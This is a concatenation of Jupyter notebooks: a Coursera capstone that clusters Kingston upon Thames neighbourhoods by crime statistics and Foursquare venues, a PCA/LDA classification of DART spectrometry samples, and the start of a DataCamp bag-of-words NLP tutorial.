# + id="Q9ElRBWAFD4C" colab_type="code" colab={} outputId="2d5f1756-96c7-4e0d-c1dd-df9239db149c" set(df.Borough) - set(London_table.Borough) # + [markdown] id="FrruaC0tFD4G" colab_type="text" # These 3 Boroughs don't match because of the unnecessary symobols present "[]" # + [markdown] id="5h3jlrTlFD4H" colab_type="text" # #### Find the index of the Boroughs that didn't match # + id="-FWYlV_hFD4I" colab_type="code" colab={} outputId="07296ebc-05fa-44cf-d9b2-9137b75f5cde" print("The index of first borough is",London_table.index[London_table['Borough'] == 'Barking and Dagenham []'].tolist()) print("The index of second borough is",London_table.index[London_table['Borough'] == 'Greenwich []'].tolist()) print("The index of third borough is",London_table.index[London_table['Borough'] == 'Hammersmith and Fulham []'].tolist()) # + [markdown] id="p5YN4yxCFD4K" colab_type="text" # #### Changing the Borough names to match the other data frame # + id="9uCiKb2hFD4P" colab_type="code" colab={} London_table.iloc[0,0] = 'Barking and Dagenham' London_table.iloc[9,0] = 'Greenwich' London_table.iloc[11,0] = 'Hammersmith and Fulham' # + [markdown] id="ZavavmyxFD4S" colab_type="text" # #### Check if the Borough names in both data sets match # + id="tPXFPy87FD4U" colab_type="code" colab={} outputId="2ddd38d2-1731-4435-f559-ff6103cfe7e2" set(df.Borough) - set(London_table.Borough) # + [markdown] id="3cnzLgJRFD4h" colab_type="text" # The Borough names in both data frames match # + [markdown] id="usMhvLCeFD4j" colab_type="text" # #### We can combine both the data frames together # + id="9oy4O6SRFD4k" colab_type="code" colab={} outputId="523816c4-633e-4704-cb0c-d49f327fec6a" Ld_crime = pd.merge(London_crime, London_table, on='Borough') Ld_crime.head(10) # + id="JeZ0Q6FNFD4q" colab_type="code" colab={} outputId="6cf57fe4-5f38-4062-dfb1-9ce60e80948f" Ld_crime.shape # + id="wvT-XuUmFD4y" colab_type="code" colab={} outputId="a9eb8b25-6f87-470d-ac0a-38ce6847a9f1" set(df.Borough) - 
set(Ld_crime.Borough) # + [markdown] id="tgo1EhWBFD45" colab_type="text" # #### Rearranging the Columns # + id="Z2lzDLd8FD47" colab_type="code" colab={} outputId="fdc99ec0-0ac9-4c0b-c32a-e92bd6efc326" # List of Column names of the data frame list(Ld_crime) # + id="KA7MnUi-FD5E" colab_type="code" colab={} outputId="17145a26-b674-4a7d-b34f-6ef7b557c3d3" columnsTitles = ['Borough','Local authority','Political control','Headquarters', 'Area (sq mi)','Population (2013 est)[1]', 'Inner','Status', 'Burglary','Criminal Damage','Drugs','Other Notifiable Offences', 'Robbery','Theft and Handling','Violence Against the Person','Total','Co-ordinates'] Ld_crime = Ld_crime.reindex(columns=columnsTitles) Ld_crime = Ld_crime[['Borough','Local authority','Political control','Headquarters', 'Area (sq mi)','Population (2013 est)[1]','Co-ordinates', 'Burglary','Criminal Damage','Drugs','Other Notifiable Offences', 'Robbery','Theft and Handling','Violence Against the Person','Total']] Ld_crime.head() # + [markdown] id="EQUw38VVFD5J" colab_type="text" # ## Methodology <a name="methodology"></a> # + [markdown] id="EArXLiDyFD5L" colab_type="text" # The methodology in this project consists of two parts: # - [Exploratory Data Analysis](#EDA): Visualise the crime rates in the London boroughs to idenity the safest borough and extract the neighborhoods in that borough to find the 10 most common venues in each neighborhood. # # # - [Modelling](#modelling): To help people find similar neighborhoods in the safest borough we will be clustering similar neighborhoods using K - means clustering which is a form of unsupervised machine learning algorithm that clusters data based on predefined cluster size. We will use a cluster size of 5 for this project that will cluster the 15 neighborhoods into 5 clusters. 
The reason to conduct a K- means clustering is to cluster neighborhoods with similar venues together so that people can shortlist the area of their interests based on the venues/amenities around each neighborhood. # # + [markdown] id="_koXAu8MFD5M" colab_type="text" # ### Exploratory Data Analysis <a name="EDA"></a> # + [markdown] id="JFT0eJtYFD5R" colab_type="text" # #### Descriptive statistics of the data # + id="V7yb-WYXFD5X" colab_type="code" colab={} outputId="2a58c782-654b-4d30-e3be-73049c2d03a5" London_crime.describe() # + id="cnJCzWfBFD5Z" colab_type="code" colab={} outputId="8f7fb165-3435-464d-c0be-b5de002761a5" # use the inline backend to generate the plots within the browser # %matplotlib inline import matplotlib as mpl import matplotlib.pyplot as plt mpl.style.use('ggplot') # optional: for ggplot-like style # check for latest version of Matplotlib print ('Matplotlib version: ', mpl.__version__) # >= 2.0.0 # Matplotlib and associated plotting modules import matplotlib.cm as cm import matplotlib.colors as colors # + [markdown] id="oGMMuPEfFD5e" colab_type="text" # #### Check if the column names are strings # + id="tw6DpDoEFD5f" colab_type="code" colab={} outputId="167d22c6-bbe7-4e60-e116-112068fd27fc" Ld_crime.columns = list(map(str, Ld_crime.columns)) # let's check the column labels types now all(isinstance(column, str) for column in Ld_crime.columns) # + [markdown] id="E-UDfqF0FD5l" colab_type="text" # #### Sort the total crimes in descenting order to see 5 boroughs with the highest number of crimes # + id="e0Yo5ASRFD5n" colab_type="code" colab={} outputId="094549a3-3ca9-4784-f08d-5713f42a12ae" Ld_crime.sort_values(['Total'], ascending = False, axis = 0, inplace = True ) df_top5 = Ld_crime.head() df_top5 # + [markdown] id="29umQmxqFD5v" colab_type="text" # #### Visualize the five boroughs with the highest number of crimes # + id="8u3fQPCnFD5w" colab_type="code" colab={} outputId="a046744b-032d-407f-d6cc-cc05a18102b0" df_tt = df_top5[['Borough','Total']] 
df_tt.set_index('Borough',inplace = True) ax = df_tt.plot(kind='bar', figsize=(10, 6), rot=0) ax.set_ylabel('Number of Crimes') # add to x-label to the plot ax.set_xlabel('Borough') # add y-label to the plot ax.set_title('London Boroughs with the Highest no. of crime') # add title to the plot # Creating a function to display the percentage. for p in ax.patches: ax.annotate(np.round(p.get_height(),decimals=2), (p.get_x()+p.get_width()/2., p.get_height()), ha='center', va='center', xytext=(0, 10), textcoords='offset points', fontsize = 14 ) plt.show() # + [markdown] id="Ph3N8cLHFD51" colab_type="text" # ### We'll stay clear from these places :) # + [markdown] id="Jtw2HkwOFD54" colab_type="text" # #### Sort the total crimes in ascending order to see 5 boroughs with the highest number of crimes # + id="aomaXagWFD56" colab_type="code" colab={} outputId="e0a0225b-0755-4c50-9eb9-f3da99562f97" Ld_crime.sort_values(['Total'], ascending = True, axis = 0, inplace = True ) df_bot5 = Ld_crime.head() df_bot5 # + [markdown] id="FtBNBbHUFD5-" colab_type="text" # #### Visualize the five boroughs with the least number of crimes # + id="4HWVWjSgFD5_" colab_type="code" colab={} outputId="2f740276-b8e2-469e-b33e-09714bfe9c43" df_bt = df_bot5[['Borough','Total']] df_bt.set_index('Borough',inplace = True) ax = df_bt.plot(kind='bar', figsize=(10, 6), rot=0) ax.set_ylabel('Number of Crimes') # add to x-label to the plot ax.set_xlabel('Borough') # add y-label to the plot ax.set_title('London Boroughs with the least no. of crime') # add title to the plot # Creating a function to display the percentage. for p in ax.patches: ax.annotate(np.round(p.get_height(),decimals=2), (p.get_x()+p.get_width()/2., p.get_height()), ha='center', va='center', xytext=(0, 10), textcoords='offset points', fontsize = 14 ) plt.show() # + [markdown] id="dP_5qLl_FD6B" colab_type="text" # The borough City of London has the lowest no. 
of crimes recorded for the year 2016, Looking into the details of the borough: # + id="FfDRjVHJFD6D" colab_type="code" colab={} outputId="07b5abd3-1c43-479c-adb1-9ce50b3a3f0d" df_col = df_bot5[df_bot5['Borough'] == 'City of London'] df_col = df_col[['Borough','Total','Area (sq mi)','Population (2013 est)[1]']] df_col # + [markdown] id="sQjJvg5ZFD6J" colab_type="text" # #### As per the wikipedia page, The City of London is the 33rd principal division of Greater London but it is not a London borough. # URL: https://en.wikipedia.org/wiki/List_of_London_boroughs # # #### Hence we will focus on the next borough with the least crime i.e. Kingston upon Thames # # ### Visualizing different types of crimes in the borough 'Kingston upon Thames' # + id="UN4tkaH9FD6J" colab_type="code" colab={} outputId="b44858ce-ec1e-4099-c8a5-b5db3bced521" df_bc1 = df_bot5[df_bot5['Borough'] == 'Kingston upon Thames'] df_bc = df_bc1[['Borough','Burglary','Criminal Damage','Drugs','Other Notifiable Offences', 'Robbery','Theft and Handling','Violence Against the Person']] df_bc.set_index('Borough',inplace = True) ax = df_bc.plot(kind='bar', figsize=(10, 6), rot=0) ax.set_ylabel('Number of Crimes') # add to x-label to the plot ax.set_xlabel('Borough') # add y-label to the plot ax.set_title('London Boroughs with the least no. of crime') # add title to the plot # Creating a function to display the percentage. for p in ax.patches: ax.annotate(np.round(p.get_height(),decimals=2), (p.get_x()+p.get_width()/2., p.get_height()), ha='center', va='center', xytext=(0, 10), textcoords='offset points', fontsize = 14 ) plt.show() # + [markdown] id="D2_dxcqBFD6M" colab_type="text" # We can conclude that Kingston upon Thames is the safest borough when compared to the other boroughs in London. # + [markdown] id="0jnKPQShFD6N" colab_type="text" # ### Part 3: Creating a new dataset of the Neighborhoods of the safest borough in London and generating their co-ordinates. 
<a name="part3"></a> # # # # The list of Neighborhoods in the Royal Borough of Kingston upon Thames was found on a wikipedia page: https://en.wikipedia.org/wiki/List_of_districts_in_the_Royal_Borough_of_Kingston_upon_Thames # + id="T4Wot1hQFD6O" colab_type="code" colab={} outputId="255d5d50-c88c-4cd3-8c20-29b70ef1f192" Neighborhood = ['Berrylands','Canbury','Chessington','Coombe','Hook','Kingston upon Thames', 'Kingston Vale','Malden Rushett','Motspur Park','New Malden','Norbiton', 'Old Malden','Seething Wells','Surbiton','Tolworth'] Borough = ['Kingston upon Thames','Kingston upon Thames','Kingston upon Thames','Kingston upon Thames', 'Kingston upon Thames','Kingston upon Thames','Kingston upon Thames','Kingston upon Thames', 'Kingston upon Thames','Kingston upon Thames','Kingston upon Thames','Kingston upon Thames', 'Kingston upon Thames','Kingston upon Thames','Kingston upon Thames'] Latitude = ['','','','','','','','','','','','','','',''] Longitude = ['','','','','','','','','','','','','','',''] df_neigh = {'Neighborhood': Neighborhood,'Borough':Borough,'Latitude': Latitude,'Longitude':Longitude} kut_neig = pd.DataFrame(data=df_neigh, columns=['Neighborhood', 'Borough', 'Latitude', 'Longitude'], index=None) kut_neig # + [markdown] id="jsEPF75pFD6X" colab_type="text" # #### Find the Co-ordiantes of each Neighborhood in the Kingston upon Thames Neighborhood # + id="SRNaZvn7FD6Y" colab_type="code" colab={} outputId="c85e6fce-7d69-49e2-9082-6fb2c6099dd2" Latitude = [] Longitude = [] for i in range(len(Neighborhood)): address = '{},London,United Kingdom'.format(Neighborhood[i]) geolocator = Nominatim(user_agent="London_agent") location = geolocator.geocode(address) Latitude.append(location.latitude) Longitude.append(location.longitude) print(Latitude, Longitude) # + id="D-29HYVIFD6b" colab_type="code" colab={} outputId="a6bf6d27-b4d7-4819-a0af-10695b3d019f" df_neigh = {'Neighborhood': Neighborhood,'Borough':Borough,'Latitude': Latitude,'Longitude':Longitude} 
kut_neig = pd.DataFrame(data=df_neigh, columns=['Neighborhood', 'Borough', 'Latitude', 'Longitude'], index=None) kut_neig # + [markdown] id="ihBxNahaFD6d" colab_type="text" # #### Get the co-ordinates of Berrylands, London, United Kingdom (The center neighborhood of Kingston upon Thames) # + id="UEfpPOrBFD6e" colab_type="code" colab={} outputId="fc2cbf48-0b58-4a0b-9747-1a58307cd0fc" address = 'Berrylands, London, United Kingdom' geolocator = Nominatim(user_agent="ld_explorer") location = geolocator.geocode(address) latitude = location.latitude longitude = location.longitude print('The geograpical coordinate of Berrylands, London are {}, {}.'.format(latitude, longitude)) # + [markdown] id="AEpkhH5IFD6m" colab_type="text" # #### Visualize the Neighborhood of Kingston upon Thames Borough # + id="p32SfvyAFD6n" colab_type="code" colab={} outputId="cc0d69b0-acaf-4aa0-eb58-ed0e5a82e18b" # create map of New York using latitude and longitude values map_lon = folium.Map(location=[latitude, longitude], zoom_start=12) # add markers to map for lat, lng, borough, neighborhood in zip(kut_neig['Latitude'], kut_neig['Longitude'], kut_neig['Borough'], kut_neig['Neighborhood']): label = '{}, {}'.format(neighborhood, borough) label = folium.Popup(label, parse_html=True) folium.CircleMarker( [lat, lng], radius=5, popup=label, color='blue', fill=True, fill_color='#3186cc', fill_opacity=0.7, parse_html=False).add_to(map_lon) map_lon # + [markdown] id="OZlRRX99FD61" colab_type="text" # ### Modelling <a name="modelling"></a> # # - Finding all the venues within a 500 meter radius of each neighborhood. # - Perform one hot ecoding on the venues data. # - Grouping the venues by the neighborhood and calculating their mean. 
# - Performing a K-means clustering (Defining K = 5)

# + [markdown] id="2EL1N5YFFD63" colab_type="text"
# #### Create a function to extract the venues from each Neighborhood

# + id="r9nV4H9dFD69" colab_type="code" colab={}
def getNearbyVenues(names, latitudes, longitudes, radius=500):
    """Query the Foursquare 'explore' endpoint for every neighborhood.

    Parameters
    ----------
    names, latitudes, longitudes : equal-length iterables describing each
        neighborhood and its coordinates.
    radius : int, optional
        Search radius in meters around each coordinate (default 500).

    Returns
    -------
    pandas.DataFrame
        One row per venue found near any of the neighborhoods.

    NOTE(review): relies on the notebook-level globals CLIENT_ID,
    CLIENT_SECRET, VERSION and LIMIT being defined before this cell runs.
    """
    collected = []
    for hood, hood_lat, hood_lng in zip(names, latitudes, longitudes):
        print(hood)

        # create the API request URL
        url = 'https://api.foursquare.com/v2/venues/explore?&client_id={}&client_secret={}&v={}&ll={},{}&radius={}&limit={}'.format(
            CLIENT_ID,
            CLIENT_SECRET,
            VERSION,
            hood_lat,
            hood_lng,
            radius,
            LIMIT)

        # make the GET request
        items = requests.get(url).json()["response"]['groups'][0]['items']

        # keep only the relevant fields for each nearby venue
        collected.append([
            (hood,
             hood_lat,
             hood_lng,
             entry['venue']['name'],
             entry['venue']['location']['lat'],
             entry['venue']['location']['lng'],
             entry['venue']['categories'][0]['name'])
            for entry in items])

    # flatten the per-neighborhood lists into a single table
    nearby_venues = pd.DataFrame([row for group in collected for row in group])
    nearby_venues.columns = ['Neighborhood',
                  'Neighborhood Latitude',
                  'Neighborhood Longitude',
                  'Venue',
                  'Venue Latitude',
                  'Venue Longitude',
                  'Venue Category']

    return nearby_venues


# + id="ALhpA1iXFD7A" colab_type="code" colab={} outputId="46c109fc-49b6-4afa-9b61-b605b94d0eab"
kut_venues = getNearbyVenues(names=kut_neig['Neighborhood'],
                             latitudes=kut_neig['Latitude'],
                             longitudes=kut_neig['Longitude']
                             )

# + id="absH7tc6FD7D" colab_type="code" colab={} outputId="a584fae3-7cb3-4fee-9ac0-0f52f57d33e1"
print(kut_venues.shape)
kut_venues.head()

# + id="W9AO70n2FD7H" colab_type="code" colab={} outputId="42213421-1fe4-4ae1-dd2f-92c67e248395"
kut_venues.groupby('Neighborhood').count()

# + id="CXXBNrrUFD7L" colab_type="code" colab={} outputId="ae700536-1588-4946-fc69-b039e66bcf19"
print('There are {} uniques categories.'.format(len(kut_venues['Venue Category'].unique())))

# + [markdown] id="2BP6r1FfFD7N" colab_type="text"
# #### One hot encoding
#
# URL:
https://hackernoon.com/what-is-one-hot-encoding-why-and-when-do-you-have-to-use-it-e3c6186d008f # + id="TvFzmW9UFD7P" colab_type="code" colab={} outputId="4cc2f540-d416-48c4-d1d3-3a9425b0e75f" # one hot encoding kut_onehot = pd.get_dummies(kut_venues[['Venue Category']], prefix="", prefix_sep="") # add neighborhood column back to dataframe kut_onehot['Neighborhood'] = kut_venues['Neighborhood'] # move neighborhood column to the first column fixed_columns = [kut_onehot.columns[-1]] + list(kut_onehot.columns[:-1]) kut_onehot = kut_onehot[fixed_columns] kut_onehot.head() # + [markdown] id="OHbjppJeFD7R" colab_type="text" # #### Grouping rows by neighborhood and by taking the mean of the frequency of occurrence of each category # + id="8I7kUNhJFD7S" colab_type="code" colab={} outputId="a30b0bd7-6a89-4746-dcc2-8e341ff98240" kut_grouped = kut_onehot.groupby('Neighborhood').mean().reset_index() kut_grouped # + id="B9XkP3SnFD7Z" colab_type="code" colab={} outputId="360cb404-6278-418b-ea12-5a9cec45c41f" kut_grouped.shape # + id="dQ9lkZKNFD7b" colab_type="code" colab={} outputId="2fdf6575-1022-4641-c127-9016a19d4b9d" num_top_venues = 5 for hood in kut_grouped['Neighborhood']: print("----"+hood+"----") temp = kut_grouped[kut_grouped['Neighborhood'] == hood].T.reset_index() temp.columns = ['venue','freq'] temp = temp.iloc[1:] temp['freq'] = temp['freq'].astype(float) temp = temp.round({'freq': 2}) print(temp.sort_values('freq', ascending=False).reset_index(drop=True).head(num_top_venues)) print('\n') # + [markdown] id="dnLQtFI5FD7d" colab_type="text" # #### Create a data frame of the venues # Function to sort the venues in descending order. 
# + id="tCoRlWtAFD7d" colab_type="code" colab={}
def return_most_common_venues(row, num_top_venues):
    """Return the names of the ``num_top_venues`` most frequent venue
    categories for a single neighborhood row.

    ``row`` is a pandas Series whose first entry is the neighborhood name
    and whose remaining entries are the mean category frequencies.
    """
    row_categories = row.iloc[1:]  # skip the leading 'Neighborhood' cell
    row_categories_sorted = row_categories.sort_values(ascending=False)
    return row_categories_sorted.index.values[0:num_top_venues]


# + [markdown] id="mNv7si0IFD7n" colab_type="text"
# Create the new dataframe and display the top 10 venues for each neighborhood

# + id="PDJPkh7lFD7o" colab_type="code" colab={} outputId="023ac7a1-8fa1-45db-8cc3-c2ea40ed4ffd"
num_top_venues = 10

indicators = ['st', 'nd', 'rd']

# create columns according to number of top venues
columns = ['Neighborhood']
for ind in np.arange(num_top_venues):
    try:
        columns.append('{}{} Most Common Venue'.format(ind+1, indicators[ind]))
    except IndexError:
        # ranks beyond 3rd all take the 'th' suffix; a bare except here
        # would also have hidden unrelated errors
        columns.append('{}th Most Common Venue'.format(ind+1))

# create a new dataframe
neighborhoods_venues_sorted = pd.DataFrame(columns=columns)
neighborhoods_venues_sorted['Neighborhood'] = kut_grouped['Neighborhood']

for ind in np.arange(kut_grouped.shape[0]):
    neighborhoods_venues_sorted.iloc[ind, 1:] = return_most_common_venues(kut_grouped.iloc[ind, :], num_top_venues)

neighborhoods_venues_sorted.head()

# + [markdown] id="nueyvUIzFD7s" colab_type="text"
# ### Clustering similar neighborhoods together using k - means clustering

# + id="EPB2QbhuFD7t" colab_type="code" colab={} outputId="be44e56e-6464-4809-8ad3-c9d870cc4816"
# import k-means from clustering stage
from sklearn.cluster import KMeans

# set number of clusters
kclusters = 5

# drop the label column before clustering; use the axis keyword
# (positional `axis` was deprecated and removed in pandas 2.0)
kut_grouped_clustering = kut_grouped.drop('Neighborhood', axis=1)

# run k-means clustering
kmeans = KMeans(n_clusters=kclusters, random_state=0).fit(kut_grouped_clustering)

# check cluster labels generated for each row in the dataframe
kmeans.labels_[0:10]

# + id="TPrlNa21FD7w" colab_type="code" colab={} outputId="fde804aa-5722-41af-a683-7bb7bb0c7c3e"
# add clustering labels
neighborhoods_venues_sorted.insert(0, 'Cluster Labels', kmeans.labels_)

kut_merged = kut_neig

# merge toronto_grouped with toronto_data to add
latitude/longitude for each neighborhood kut_merged = kut_merged.join(neighborhoods_venues_sorted.set_index('Neighborhood'), on='Neighborhood') kut_merged.head() # check the last columns! # + id="N8ti5TSPFD72" colab_type="code" colab={} outputId="f7c28a2d-7373-4384-a695-74faf7ce982b" kut_merged.info() # + id="XaF6ty0mFD8B" colab_type="code" colab={} # Dropping the row with the NaN value kut_merged.dropna(inplace = True) # + id="g7tsAyU6FD8l" colab_type="code" colab={} outputId="316ce7a8-21fc-4c05-8ead-77441e755302" kut_merged.shape # + id="IWN3sXmHFD8x" colab_type="code" colab={} kut_merged['Cluster Labels'] = kut_merged['Cluster Labels'].astype(int) # + id="3N-qbU1sFD9B" colab_type="code" colab={} outputId="90b3183d-fb4f-4b2c-b2fc-41369f84372d" kut_merged.info() # + [markdown] id="E1qLeUSZFD9H" colab_type="text" # ### Visualize the clusters # + id="9JoTr2AuFD9I" colab_type="code" colab={} outputId="1b2d818b-5ec4-4f9c-e21a-0ebb1852155e" # create map map_clusters = folium.Map(location=[latitude, longitude], zoom_start=11.5) # set color scheme for the clusters x = np.arange(kclusters) ys = [i + x + (i*x)**2 for i in range(kclusters)] colors_array = cm.rainbow(np.linspace(0, 1, len(ys))) rainbow = [colors.rgb2hex(i) for i in colors_array] # add markers to the map markers_colors = [] for lat, lon, poi, cluster in zip(kut_merged['Latitude'], kut_merged['Longitude'], kut_merged['Neighborhood'], kut_merged['Cluster Labels']): label = folium.Popup(str(poi) + ' Cluster ' + str(cluster), parse_html=True) folium.CircleMarker( [lat, lon], radius=8, popup=label, color=rainbow[cluster-1], fill=True, fill_color=rainbow[cluster-1], fill_opacity=0.5).add_to(map_clusters) map_clusters # + [markdown] id="FUqUtNZtFD9Z" colab_type="text" # Each cluster is color coded for the ease of presentation, we can see that majority of the neighborhood falls in the red cluster which is the first cluster. 
Three neighborhoods have their own cluster (Blue, Purple and Yellow), these are clusters two three and five. The green cluster consists of two neighborhoods which is the 4th cluster. # + [markdown] id="snuhE9dvFD9b" colab_type="text" # ## Analysis <a name="analysis"></a> # # Analyse each of the clusters to identify the characteristics of each cluster and the neighborhoods in them. # + [markdown] id="H-e0R8QDFD9h" colab_type="text" # #### Examine the first cluster # + id="qaAONqWAFD9j" colab_type="code" colab={} outputId="ff9b7dd9-ea48-4fce-fa5d-d01fa5ecb6f4" kut_merged[kut_merged['Cluster Labels'] == 0] # + [markdown] id="d4A1A_SxFD9n" colab_type="text" # The cluster one is the biggest cluster with 9 of the 15 neighborhoods in the borough Kingston upon Thames. Upon closely examining these neighborhoods we can see that the most common venues in these neighborhoods are Restaurants, Pubs, Cafe, Supermarkets, and stores. # + [markdown] id="bbM60gT4FD9t" colab_type="text" # #### Examine the second cluster # + id="7yp3ftpVFD9z" colab_type="code" colab={} outputId="88cb2b0e-571d-4453-b73e-55f849320cae" kut_merged[kut_merged['Cluster Labels'] == 1] # + [markdown] id="KctfmlPgFD-D" colab_type="text" # The second cluster has one neighborhood which consists of Venues such as Restaurants, Golf courses, and wine shops. # + [markdown] id="2AvZJaHMFD-E" colab_type="text" # #### Examine the third cluster # + id="7wdS-APvFD-F" colab_type="code" colab={} outputId="14c1191d-e16d-4360-87a0-98a9b9cdaba8" kut_merged[kut_merged['Cluster Labels'] == 2] # + [markdown] id="-Sx1bWXyFD-K" colab_type="text" # The third cluster has one neighborhood which consists of Venues such as Train stations, Restaurants, and Furniture shops. 
# + [markdown] id="9T6UF5_aFD-L" colab_type="text" # #### Examine the forth cluster # + id="IcKQMawRFD-N" colab_type="code" colab={} outputId="b2235331-63bc-41b9-bb62-a7a44e5e907a" kut_merged[kut_merged['Cluster Labels'] == 3] # + [markdown] id="0PqciB59FD-U" colab_type="text" # The fourth cluster has two neighborhoods in it, these neighborhoods have common venues such as Parks, Gym/Fitness centers, Bus Stops, Restaurants, Electronics Stores and Soccer fields etc. # # + [markdown] id="qRL9BxGJFD-V" colab_type="text" # #### Examine the fifth cluster # + id="hjSvT36NFD-W" colab_type="code" colab={} outputId="17fa48fe-cf98-41e7-a12d-e11779935548" kut_merged[kut_merged['Cluster Labels'] == 4] # + [markdown] id="TSTfJJrAFD-Z" colab_type="text" # The fifth cluster has one neighborhood which consists of Venues such as Grocery shops, Bars, Restaurants, Furniture shops, and Department stores. # + [markdown] id="rO-WgERGFD-Z" colab_type="text" # ## Results and Discussion <a name="results"></a> # + [markdown] id="zeZiL3j_FD-a" colab_type="text" # The aim of this project is to help people who want to relocate to the safest borough in London, expats can chose the neighborhoods to which they want to relocate based on the most common venues in it. For example if a person is looking for a neighborhood with good connectivity and public transportation we can see that Clusters 3 and 4 have Train stations and Bus stops as the most common venues. If a person is looking for a neighborhood with stores and restaurants in a close proximity then the neighborhoods in the first cluster is suitable. For a family I feel that the neighborhoods in Cluster 4 are more suitable dues to the common venues in that cluster, these neighborhoods have common venues such as Parks, Gym/Fitness centers, Bus Stops, Restaurants, Electronics Stores and Soccer fields which is ideal for a family. 
# + [markdown] id="wZVrTi-bFD-a" colab_type="text" # ## Conclusion <a name="conclusion"></a> # + [markdown] id="TPi_fBxFFD-b" colab_type="text" # This project helps a person get a better understanding of the neighborhoods with respect to the most common venues in that neighborhood. It is always helpful to make use of technology to stay one step ahead i.e. finding out more about places before moving into a neighborhood. We have just taken safety as a primary concern to shortlist the borough of London. The future of this project includes taking other factors such as cost of living in the areas into consideration to shortlist the borough based on safety and a predefined budget.
Coursera_capstone/all_assignments/Capstone_Project_The_Battle_of_the_Neighborhoods_London_Neighborhood_Clustering.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: 'Python 3.8.5 64-bit (''base'': conda)' # language: python # name: python3 # --- import pandas as pd import os import numpy as np import matplotlib.pyplot as plt import seaborn as sns folder = 'data' df = pd.read_excel(os.path.join(folder, '20211128 - Full DART Data (Model & Test).xlsx'), header=2) df.head() labeled_df = df[df['Sample Types'] == 'Model'] recol = [(float('.'.join(col.split('.')[:2])) if isinstance(col, str) else col) for col in df.columns[4:]] unique_classes = labeled_df['Class'].unique() labeled_df['Class'].value_counts() # + def plot(df, unique_classes): for label in unique_classes: df = labeled_df[labeled_df['Class'] == label] for ind, row in df.iterrows(): plt.plot(recol, row.iloc[4:]) plt.title(row["Sample"]) plt.savefig(os.path.join("figures_real_data", f"sample_class_{label}_sample_{row['Sample']}.png")) plt.close() return # plot(df, unique_classes) # + savefolder = 'figures_real_data' def extractor(labeled_df, unique_classes, recol, gt=25): #for label in unique_classes: label = unique_classes[0] df = labeled_df[labeled_df['Class'] == label] data = df[df.columns[4:]].values data[data<gt] = 0 active_peaks_locs = (data > gt).any(axis=0) active_peaks = data[:, active_peaks_locs] active_recol = [r for r,b in zip(recol, active_peaks_locs) if b] for i in range(active_peaks.shape[1]): plt.plot(active_peaks[:,i]) plt.title(f'{label} - {active_recol[i]}') plt.savefig(os.path.join(savefolder, f'peak_activation_class_{label}_peak_{i}.png')) plt.close() extractor(labeled_df, unique_classes, recol) # - # + from sklearn.cluster import KMeans import matplotlib.pyplot as plt from sklearn.decomposition import PCA import matplotlib from sklearn.discriminant_analysis import LinearDiscriminantAnalysis from sklearn.metrics import classification_report, confusion_matrix from 
sklearn.model_selection import train_test_split gt=25 big_df = labeled_df.copy() df = big_df[big_df['Class'].isin(unique_classes)] # [:10] print(df.shape, labeled_df.shape) data = df[df.columns[4:]].values data[data<gt] = 0 active_peaks_locs = (data > gt).any(axis=0) active_peaks = data[:, active_peaks_locs] inertias = [] ks = range(1,36,2) for k in ks: km = KMeans(n_clusters=k) km.fit(active_peaks) inertias.append(km.inertia_) plt.plot(ks, inertias) plt.show() #colors = ['red', 'green', 'blue', 'orange', 'brown'] df_unique_classes = df['Class'].unique() cmap = matplotlib.cm.get_cmap('Spectral') colors = [cmap(i) for i in np.linspace(0,1,len(df_unique_classes))] df['class_color'] = df['Class'] df['class_color'] = df['class_color'].map(dict(zip(df_unique_classes, colors[:len(df_unique_classes)]))) fig = plt.figure() ax = fig.add_subplot(projection='3d') pca = PCA(n_components=3) pca_X = pca.fit_transform(active_peaks) for label in df_unique_classes: mask = df['Class'] == label sub = df.loc[mask] ax.scatter(pca_X[mask,0], pca_X[mask,1], pca_X[mask,2], c=sub['class_color'], label=label) plt.legend() plt.show() train_df, test_df, Xtrain, Xtest = train_test_split(df, active_peaks, train_size=0.7, stratify=df['Class']) ytrain = train_df['Class'].values ytest = test_df['Class'].values lda = LinearDiscriminantAnalysis() lda.fit(Xtrain, ytrain) ypred = lda.predict(Xtest) print(classification_report(ytest, ypred)) print(confusion_matrix(ytest, ypred)) # -
extractor_real_to_sim.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # N-Gram models # > Learn about n-gram modeling and use it to perform sentiment analysis on movie reviews. This is the Summary of lecture "Feature Engineering for NLP in Python", via datacamp. # # - toc: true # - badges: true # - comments: true # - author: <NAME> # - categories: [Python, Datacamp, Natural_Language_Processing] # - image: # + import pandas as pd import numpy as np import matplotlib.pyplot as plt import spacy plt.rcParams['figure.figsize'] = (8, 8) # - # ## Building a bag of words model # - Bag of words model # - Extract word tokens # - Compute frequency of word tokens # - Construct a word vector out of these frequencies and vocabulary of corpus # ### BoW model for movie taglines # In this exercise, you have been provided with a `corpus` of more than 7000 movie tag lines. Your job is to generate the bag of words representation `bow_matrix` for these taglines. For this exercise, we will ignore the text preprocessing step and generate `bow_matrix` directly. movies = pd.read_csv('./dataset/movie_overviews.csv').dropna() movies['tagline'] = movies['tagline'].str.lower() movies.head() corpus = movies['tagline'] # + from sklearn.feature_extraction.text import CountVectorizer # Create CountVectorizer object vectorizer = CountVectorizer() # Generate matrix of word vectors bow_matrix = vectorizer.fit_transform(corpus) # Print the shape of bow_matrix print(bow_matrix.shape) # - # You now know how to generate a bag of words representation for a given corpus of documents. Notice that the word vectors created have more than 6600 dimensions. However, most of these dimensions have a value of zero since most words do not occur in a particular tagline. 
# ### Analyzing dimensionality and preprocessing # In this exercise, you have been provided with a `lem_corpus` which contains the pre-processed versions of the movie taglines from the previous exercise. In other words, the taglines have been lowercased and lemmatized, and stopwords have been removed. # # Your job is to generate the bag of words representation `bow_lem_matrix` for these lemmatized taglines and compare its shape with that of `bow_matrix` obtained in the previous exercise. nlp = spacy.load('en_core_web_sm') stopwords = spacy.lang.en.stop_words.STOP_WORDS lem_corpus = corpus.apply(lambda row: ' '.join([t.lemma_ for t in nlp(row) if t.lemma_ not in stopwords and t.lemma_.isalpha()])) lem_corpus # + # Create CountVectorizer object vectorizer = CountVectorizer() # Generate of word vectors bow_lem_matrix = vectorizer.fit_transform(lem_corpus) # Print the shape of how_lem_matrix print(bow_lem_matrix.shape) # - # ### Mapping feature indices with feature names # n the lesson video, we had seen that `CountVectorizer` doesn't necessarily index the vocabulary in alphabetical order. In this exercise, we will learn to map each feature index to its corresponding feature name from the vocabulary. sentences = ['The lion is the king of the jungle', 'Lions have lifespans of a 